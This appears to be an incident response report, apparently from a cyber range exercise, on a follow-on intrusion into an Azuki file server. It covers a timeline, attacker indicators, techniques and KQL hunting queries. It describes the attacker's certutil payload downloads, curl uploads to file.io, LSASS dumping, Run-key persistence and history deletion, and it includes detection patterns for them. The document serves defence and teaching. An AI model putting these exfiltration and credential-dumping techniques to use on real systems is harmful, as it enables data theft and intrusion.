Incident Response Report
Azuki Import/Export
Follow-On Intrusion — AZUKI-FILESERVER01
AZUKI-2025-Q4-02  ·  Post-Compromise Activity  ·  2025-11-22
ESCALATED TO
Josh — Cyber Range Community
Incident ID
AZUKI-2025-Q4-02
Predecessor
AZUKI-2025-Q4-01
Date of Report
February 18, 2026
Severity
CRITICAL
Report Status
Investigation Complete (Post-Incident Review)
Escalated To
Incident Response Lead
Analyst
Yousef Nabil
01 Executive Summary

This report documents a follow-on intrusion in the Azuki Import/Export environment that occurred after an initial access event captured in AZUKI-2025-Q4-01. Evidence confirms the threat actor returned approximately 72 hours after initial access, rotated external infrastructure, and executed a focused data collection and credential access operation primarily on AZUKI-FILESERVER01. All timestamps are reported in UTC unless otherwise stated.

During the follow-on activity, the actor conducted share and system discovery, staged sensitive data to a hidden directory (C:\Windows\Logs\CBS), compressed multiple datasets for transfer, and exfiltrated archives and a credential theft artefact (lsass.dmp) to an external web service. Persistence was established via a registry Run key configured to execute a hidden PowerShell script at startup, and anti-forensic activity was observed through deletion of PowerShell command history.

Confirmed impact includes unauthorised access to internal file shares, creation of a credential export file within the staging directory, confirmed external upload of multiple archives, and attempted credential theft via LSASS memory dumping. Given the presence of persistence, credential access activity, and confirmed exfiltration, this incident is assessed as CRITICAL and requires immediate containment and credential remediation actions.

02 WHO
External IPs
IP AddressRoleLocationASN / OrgNotes
159.26.106.98Return access source (RDP)London, United KingdomAS208172 — Proton AGVPN/hosting egress — operator OPSEC; rotated from 88.97.178.12
78.141.196.6Staging + C2 server (retained)London, United KingdomAS20473 — Vultr Holdings LLCPreviously observed; :8080/:7331 payload, :8880 C2 tasking/beaconing
file.ioExfiltration destinationExternal (public service)Public file transfer service abused for multipart/form-data uploads
Attacker Infrastructure
IndicatorRoleNotes
78.141.196.6:7331/8080Payload/script deliverycertutil download of ex.ps1
78.141.196.6:8880C2 tasking/beaconingcurl.exe against /api/tasks and /api/beacon endpoints
https://file.ioExfiltration endpointcurl.exe multipart uploads of archives and lsass.dmp
Accounts Used
AccountTypeUsage Observed
kenji.satoCompromised userReturn access to AZUKI-SL from 159.26.106.98
fileadminCompromised adminInteractive execution on AZUKI-FILESERVER01 (discovery, staging, exfiltration)
03 WHAT
  • Threat actor returned using rotated external infrastructure and resumed interactive operations after a dwell period.
  • Threat actor enumerated SMB shares using net.exe / net1.exe and validated access to remote shares via UNC (T1135).
  • Threat actor performed host and network discovery (ipconfig.exe /all; ARP.EXE -a) under the fileadmin context.
  • Threat actor staged data under C:\Windows\Logs\CBS and applied Hidden/System attributes using attrib.exe +h +s (T1564.001).
  • Threat actor downloaded a PowerShell script via certutil.exe -urlcache -f from 78.141.196.6 (T1105).
  • Threat actor recursively copied content from internal shares into the staging directory using xcopy.exe /E /I /H /Y (T1119, T1074.001).
  • Threat actor created a credential export file in the staging directory: C:\Windows\Logs\CBS\it-admin\IT-Admin-Passwords.csv (T1552, T1555).
  • Threat actor compressed staged content into .zip and .tar.gz archives in preparation for transfer.
  • Threat actor executed a renamed credential dumping utility (pd.exe) to create an LSASS memory dump (lsass.dmp) (T1036.003, T1003).
  • Threat actor established persistence by adding a Run key value name designed to appear legitimate: FileShareSync (T1547.001).
  • Threat actor exfiltrated staged archives and lsass.dmp to an external web service using curl.exe multipart uploads (-F file=@...) (T1567).
  • Threat actor deleted PowerShell PSReadLine history (ConsoleHost_history.txt) to reduce forensic traceability (T1070.003).
04 WHEN

Timeline (UTC):

2025-11-22 00:27:58Follow-on access observed; external return IP identified as 159.26.106.98.
00:42:23 – 00:42:37Discovery commands executed on AZUKI-FILESERVER01 (ipconfig.exe /all; ARP.EXE -a).
00:43:05 – 00:43:07Share enumeration executed (net.exe share; net1.exe share).
00:43:23Remote share enumeration executed (net.exe view \\10.1.0.188).
00:56:47Tool transfer: certutil.exe downloads ex.ps1 to C:\Windows\Logs\CBS\ex.ps1 from 78.141.196.6.
01:07:53Credential file staged: IT-Admin-Passwords.csv created in C:\Windows\Logs\CBS\it-admin.
01:19:24Bulk staging: xcopy.exe replicates C:\FileShares\IT-Admin to C:\Windows\Logs\CBS\it-admin.
01:20:46Bulk staging: xcopy.exe replicates C:\FileShares\Shipping to C:\Windows\Logs\CBS\shipping.
01:21:38 – 01:30:10Compression: archives created (contracts.zip, financial.zip, it-admin.zip, credentials.zip, financial.tar.gz, credentials.tar.gz).
01:59:54 – 02:00:20Exfiltration: curl.exe uploads staged archives to https://file.io.
02:10:50Persistence: Run key value FileShareSync added to HKLM\...\CurrentVersion\Run.
02:24:47Credential access: pd.exe creates LSASS memory dump at C:\Windows\Logs\CBS\lsass.dmp.
02:25:37Exfiltration: curl.exe uploads lsass.dmp to https://file.io.
02:26:01Anti-forensics: ConsoleHost_history.txt deleted from PSReadLine directory.
05 WHERE
Targets
HostRole
AZUKI-SLBeachhead workstation — return operator access (kenji.sato from 159.26.106.98)
AZUKI-FILESERVER01Primary activity host — discovery, staging, exfiltration, credential dumping, persistence
10.1.0.188Internal SMB target — enumerated via net view
Malware / Tool Paths
  • C:\Windows\Logs\CBS\ (hidden staging directory)
  • C:\Windows\Logs\CBS\ex.ps1
  • C:\Windows\Logs\CBS\it-admin\IT-Admin-Passwords.csv
  • C:\Windows\Logs\CBS\contracts.zip
  • C:\Windows\Logs\CBS\financial.zip
  • C:\Windows\Logs\CBS\credentials.zip
  • C:\Windows\Logs\CBS\financial.tar.gz
  • C:\Windows\Logs\CBS\credentials.tar.gz
  • C:\Windows\Logs\CBS\pd.exe
  • C:\Windows\Logs\CBS\lsass.dmp
  • C:\Windows\System32\svchost.ps1
  • C:\Users\fileadmin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt (deleted)
Network Connections
Source → DestinationProtocol / PortPurpose
AZUKI-SL ⇄ 159.26.106.98RDPFollow-on operator access
AZUKI-FILESERVER01 → 78.141.196.6HTTP (7331/8080)Payload/script retrieval (certutil)
AZUKI-FILESERVER01 → 78.141.196.6HTTP (8880)C2 tasking and beaconing (curl)
AZUKI-FILESERVER01 → file.ioHTTPS (443)Exfiltration of staged archives and lsass.dmp (curl -F)
AZUKI-FILESERVER01 → 10.1.0.188SMB (445)Remote share enumeration/access (net view)
06 WHY
Root Cause
  • Compromised credentials enabling interactive access and execution as legitimate users/administrators.
  • Insufficient privileged access protections allowing administrative account reuse across systems.
  • Lack of preventive controls for high-risk LOLBins (certutil, xcopy, tar, reg, curl) allowed data staging and exfiltration using trusted binaries.
  • File share controls permitted bulk copy/compression operations without blocking or immediate alerting.
Attacker Goal

Observed tradecraft and outcomes confirm the threat actor's goal was large-scale data theft and credential harvesting to enable continued access and lateral movement.

07 HOW
Return Access + Discovery
  • After a short dwell period, the operator returned from a new external IP (159.26.106.98) and resumed hands-on-keyboard activity. On AZUKI-FILESERVER01, the actor executed network and share discovery (ipconfig, ARP, net share, net view) to validate accessible resources and identify high-value share content for collection.
Staging + Collection
  • The actor staged data under C:\Windows\Logs\CBS and applied Hidden/System attributes to reduce visibility. Using xcopy with recursive copy parameters (/E /I /H /Y), the actor replicated internal share contents into subdirectories (it-admin, shipping) and aggregated high-value datasets including email archives, customs/shipping documentation, contracts, financial data, and an administrative credential export file (IT-Admin-Passwords.csv).
Compression + Exfiltration
  • Staged data was compressed into multiple archives (.zip and .tar.gz) and transferred externally using curl.exe multipart uploads to https://file.io. This technique provides a low-friction, scriptable exfiltration path and minimises custom tooling requirements. The actor also maintained HTTP-based tasking/beaconing with the external server 78.141.196.6 over port 8880 during the staging and exfiltration window.
Credential Access + Persistence + Anti-Forensics
  • Credential theft intent was confirmed by execution of a renamed dumping utility (pd.exe) to generate an LSASS memory dump (lsass.dmp), which was subsequently uploaded externally. Persistence was established by creating a registry Run key value (FileShareSync) configured to execute a hidden PowerShell script (svchost.ps1) at startup. To reduce traceability, the actor deleted the PSReadLine history file ConsoleHost_history.txt, which normally records interactive PowerShell commands across sessions.
08 IMPACT
ConfirmedConfirmed unauthorised staging and exfiltration of multiple datasets from internal file shares (contracts, financial, shipping, and IT administration).
ConfirmedCredential exposure risk: IT-Admin-Passwords.csv created in staging; LSASS memory dump created and exfiltrated.
ConfirmedPersistence established on AZUKI-FILESERVER01 via HKLM Run key value FileShareSync launching a hidden PowerShell script.
ConfirmedForensic visibility reduced by deletion of PowerShell history artefacts (ConsoleHost_history.txt).
Risk: CRITICALConfirmed data exfiltration combined with credential dumping activity and persistence on a core file server significantly increases the likelihood of continued unauthorised access, lateral movement, and secondary compromise across the environment.
09 THREAT INTELLIGENCE

159.26.106.98 (Return Access Source) — Public enrichment identifies this address as associated with AS208172 (Proton AG) and located in London, United Kingdom. Use of VPN/hosting egress infrastructure is consistent with operator OPSEC and rotating access nodes between sessions.

78.141.196.6 (Staging + C2 Server) — This IP was previously observed as attacker-controlled infrastructure and is associated with AS20473 (Vultr Holdings; 78.141.196.6.vultrusercontent.com). During follow-on activity, it supported both payload hosting (ex.ps1 retrieval via certutil) and ongoing HTTP tasking/beaconing observed via curl.exe against /api/tasks and /api/beacon endpoints.

file.io (Exfiltration Destination) — A public file transfer service abused for rapid, scriptable exfiltration using multipart/form-data uploads. The actor uploaded multiple archives and an LSASS dump (lsass.dmp), consistent with data theft and credential harvesting objectives.

Tools and Tradecraft Observed (host-based)
  • certutil.exe -urlcache -f for payload transfer into a non-standard staging directory (T1105).
  • xcopy.exe /E /I /H /Y for recursive staging while preserving directories and hidden files (T1119, T1074.001).
  • tar.exe and PowerShell archive operations to package staged content for transfer (T1074.001).
  • curl.exe with -F file=@... for multipart uploads to a web service (T1567).
  • reg.exe add to create HKLM Run key persistence (T1547.001).
  • attrib.exe +h +s to hide staging directory artefacts (T1564.001).
  • pd.exe (renamed ProcDump-style utility) used to create LSASS dump (T1003, T1036.003).
  • PowerShell PSReadLine history deletion to reduce evidence of interactive activity (T1070.003).
Malware / Payload Observations (based on paths + behaviour)
  • ex.ps1 was retrieved from external infrastructure and written under C:\Windows\Logs\CBS; likely used to facilitate staging and/or automation of collection tasks.
  • svchost.ps1 was configured for autostart execution at startup using a hidden PowerShell invocation; this represents an established persistence mechanism.
  • pd.exe executed with Sysinternals-style parameters (/accepteula, -ma) consistent with a renamed ProcDump-like tool used for LSASS dumping.
10 RECOMMENDATIONS
Immediate
  • Isolate AZUKI-FILESERVER01 and AZUKI-SL to prevent additional staging, exfiltration, or lateral movement.
  • Reset credentials and revoke sessions for all potentially exposed accounts (at minimum: fileadmin, kenji.sato) and any accounts stored in IT-Admin-Passwords.csv.
  • Remove persistence: delete Run key value FileShareSync and quarantine C:\Windows\System32\svchost.ps1.
  • Preserve evidence: collect memory images and relevant logs (endpoint telemetry, Security logs, PowerShell logs where available) before system cleanup.
  • Block outbound connectivity to known attacker infrastructure and abuse destinations (78.141.196.6, file.io) via firewall/proxy controls.
  • Hunt across endpoints for indicators: ex.ps1, pd.exe, lsass.dmp, archives under C:\Windows\Logs\CBS, and similar hidden staging folders.
Short-Term (24–48 Hours)
  • Assume credential compromise; conduct password resets for impacted user and service accounts, and rotate any secrets accessible from the file server.
  • Scope expansion: identify other hosts contacted via SMB and validate whether additional shares were staged or exfiltrated.
  • Deploy detections for curl.exe multipart uploads, certutil -urlcache downloads, attrib +h +s on abnormal paths, and reg.exe Run key creation.
  • Review administrative share permissions and audit share access patterns for abnormal bulk copy activity.
  • Validate no additional persistence exists (scheduled tasks, services, WMI subscriptions, startup folders).
Long-Term (1–4 Weeks)
  • Enforce MFA and conditional access for privileged identities; restrict privileged account use on workstations and file servers.
  • Implement egress filtering and proxy controls to prevent direct uploads to public file transfer services.
  • Harden and monitor file servers: enable enhanced auditing for bulk copy and archive creation in sensitive directories.
  • Reduce LOLBin abuse surface by applying application control policies and monitoring high-risk binaries and suspicious command-line usage.
  • Improve centralised logging and tamper resistance for PowerShell telemetry and endpoint artefacts.
11 LESSONS LEARNED
  • Dwell time and infrastructure rotation highlight the need for behavioural detection beyond static IP blocks.
  • File servers are prime collection points; monitoring for recursive copy + compression behaviours provides high signal for data staging.
  • Public web services provide low-friction exfiltration paths; egress controls and SSL inspection/visibility are necessary to detect abuse.
  • Credential dumping attempts should trigger immediate credential rotation and privileged access reviews.
  • Deletion of PSReadLine history reinforces the need for centralised PowerShell logging that cannot be erased from endpoints.
12 KQL QUERIES
Q01 — Initial logon scoping to AZUKI endpoints
KQL
DeviceLogonEvents
| where DeviceName contains "azuki"
Q02 — Validate RemoteInteractive/Network logons to AZUKI endpoints (return access)
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where DeviceName has "azuki"
| where ActionType == "LogonSuccess"
| where LogonType in ("RemoteInteractive", "Network")
| project TimeGenerated, DeviceName, AccountName, RemoteIP, LogonType
| order by TimeGenerated asc
Q03 — Validate logon success to azuki-sl with specific return IP
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where DeviceName == "azuki-sl"
| where ActionType == "LogonSuccess"
| where RemoteIP == "159.26.106.98"
| project TimeGenerated, DeviceName, AccountName, LogonType, RemoteIP, ActionType, FailureReason
| order by TimeGenerated asc
Q04 — Process execution by compromised user kenji.sato on azuki-sl
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where DeviceName == "azuki-sl"
| where AccountName == "kenji.sato"
| project TimeGenerated, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated asc
Q05 — Process execution with HTTP URLs (tool transfer/C2)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where DeviceName has "azuki-fileserver01"
| where ProcessCommandLine has "http"
| project TimeGenerated, AccountName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q06 — Process execution on fileserver01 (noise reduction — exclude SYSTEM)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| where AccountName != "system"
Q07 — Discovery commands on fileserver01 (arp, ipconfig, net, whoami)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where ProcessCommandLine has_any ("arp.exe", "ipconfig.exe", "net.exe", "net1.exe", "whoami.exe")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q08 — Privilege enumeration (whoami /priv /all /groups)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where ProcessCommandLine has_any ("whoami /priv", "whoami /all", "whoami /groups")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q09 — Process execution by fileadmin account on fileserver01
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where AccountName == "fileadmin"
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q10 — PowerShell-initiated processes on fileserver01
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where InitiatingProcessFileName == "powershell.exe"
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q11 — Pivot — validate host owning IP 10.1.0.188 via network events
KQL
DeviceNetworkEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-23))
| where LocalIP == "10.1.0.188"
| project TimeGenerated, DeviceName, InitiatingProcessFileName, LocalIP, LocalPort, RemoteIP, RemotePort, Protocol
| order by TimeGenerated asc
Q12 — Pivot — find network connections to 10.1.0.188 (SMB/lateral movement)
KQL
DeviceNetworkEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-23))
| where RemoteIP == "10.1.0.188"
| project TimeGenerated, DeviceName, InitiatingProcessFileName, LocalIP, LocalPort, RemoteIP, RemotePort, Protocol
| order by TimeGenerated asc
Q13 — Pivot — identify logon activity associated with IP 10.1.0.188
KQL
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-23))
| where RemoteIP == "10.1.0.188"
| project TimeGenerated, RemoteIP, DeviceName, AccountName, LogonType, ActionType
Q14 — Defense evasion — hide staging directory (attrib +h +s)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-11-23))
| where DeviceName == "azuki-sl"
| where ProcessCommandLine contains "attrib.exe"
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q15 — Defense evasion — staging directory creation on fileserver01
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where ProcessCommandLine has_any ("mkdir", "New-Item", "attrib")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q16 — Collection/Staging — file creation in CBS staging directory
KQL
DeviceFileEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where FolderPath startswith "C:\\Windows\\Logs\\CBS"
| where ActionType in ("FileCreated","FileRenamed")
| project TimeGenerated, DeviceName, AccountName, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q17 — Exfiltration — curl multipart upload (-F file=@)
KQL
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where DeviceName == "azuki-fileserver01"
| where FileName =~ "curl.exe"
| where ProcessCommandLine has_any ("-F", "file=@")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q18 — Persistence — Run key modification (HKLM\...\Run)
KQL
DeviceRegistryEvents
| where TimeGenerated between (datetime(2025-11-22) .. datetime(2025-11-23))
| where RegistryKey has @" CurrentVersion\Run"
| where ActionType == "RegistryValueSet"
| project TimeGenerated, DeviceName, AccountName, RegistryKey, RegistryValueName, RegistryValueData, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q19 — Anti-forensics — PowerShell history deletion (ConsoleHost_history.txt)
KQL
DeviceFileEvents
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-11-23))
| where ActionType == "FileDeleted"
| where FolderPath has "PSReadLine"
| project TimeGenerated, DeviceName, AccountName, ActionType, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
CONFIDENTIAL Azuki — Follow-On Intrusion  ·  Yousef Nabil  ·  February 18, 2026